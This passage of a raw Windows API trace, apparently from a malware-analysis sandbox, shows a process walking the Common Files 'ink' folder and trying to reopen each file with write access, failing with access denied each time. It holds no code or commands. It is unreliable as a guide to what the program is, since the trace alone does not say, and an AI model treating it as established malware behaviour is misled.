returned 0x887e8 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0098.558] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78550 [0098.558] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.558] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0098.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0098.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0098.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0098.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0098.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0098.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0098.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0098.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0098.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0098.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0098.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0098.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.559] AreFileApisANSI () returned 1 [0098.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0098.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0098.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.559] AreFileApisANSI () returned 1 [0098.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85580 [0098.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 73 [0098.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0098.560] GetFileType (hFile=0x368) returned 0x1 [0098.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0098.560] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.560] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.560] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.560] CloseHandle (hObject=0x368) returned 1 [0098.561] AreFileApisANSI () returned 1 [0098.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x859e0 [0098.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 73 [0098.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.561] GetLastError () returned 0x5 [0098.561] GetLastError () returned 0x5 [0098.561] SetLastError (dwErrCode=0x5) [0098.561] GetLastError () returned 0x5 [0098.561] SetLastError (dwErrCode=0x5) [0098.561] GetLastError () returned 0x5 [0098.561] SetLastError (dwErrCode=0x5) [0098.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0098.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0098.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.561] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c7a8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0098.561] FindClose (in: hFindFile=0x78550 | out: hFindFile=0x78550) returned 1 [0098.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0098.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0098.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0098.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0098.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.563] AreFileApisANSI () returned 1 [0098.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml", lpUsedDefaultChar=0x0) returned 63 [0098.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0098.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.563] AreFileApisANSI () returned 1 [0098.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0098.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e7a0 [0098.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6e7a0, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 63 [0098.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.563] GetFileType (hFile=0x418) returned 0x1 [0098.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0098.564] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.564] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.564] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.564] CloseHandle (hObject=0x418) returned 1 [0098.564] AreFileApisANSI () returned 1 [0098.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0098.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6ea48 [0098.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 63 [0098.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.565] GetLastError () returned 0x5 [0098.565] GetLastError () returned 0x5 [0098.565] SetLastError (dwErrCode=0x5) [0098.565] GetLastError () returned 0x5 [0098.565] SetLastError (dwErrCode=0x5) [0098.565] GetLastError () returned 0x5 [0098.565] SetLastError (dwErrCode=0x5) [0098.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0098.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0098.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.565] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0554b83, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0098.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0098.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0098.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0098.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0098.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0098.565] AreFileApisANSI () returned 1 [0098.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ", lpUsedDefaultChar=0x0) returned 57 [0098.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0098.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0098.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.566] AreFileApisANSI () returned 1 [0098.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0098.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ") returned 57 [0098.566] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.566] GetLastError () returned 0x5 [0098.566] GetLastError () returned 0x5 [0098.566] SetLastError (dwErrCode=0x5) [0098.566] GetLastError () returned 0x5 [0098.566] SetLastError (dwErrCode=0x5) [0098.566] GetLastError () returned 0x5 [0098.566] SetLastError (dwErrCode=0x5) [0098.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0098.566] AreFileApisANSI () returned 1 [0098.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0098.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ") returned 57 [0098.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.567] GetLastError () returned 0x5 [0098.567] GetLastError () returned 0x5 [0098.567] SetLastError (dwErrCode=0x5) [0098.567] GetLastError () returned 0x5 [0098.567] SetLastError (dwErrCode=0x5) [0098.567] GetLastError () returned 0x5 [0098.567] SetLastError (dwErrCode=0x5) [0098.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0098.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0098.567] HeapFree 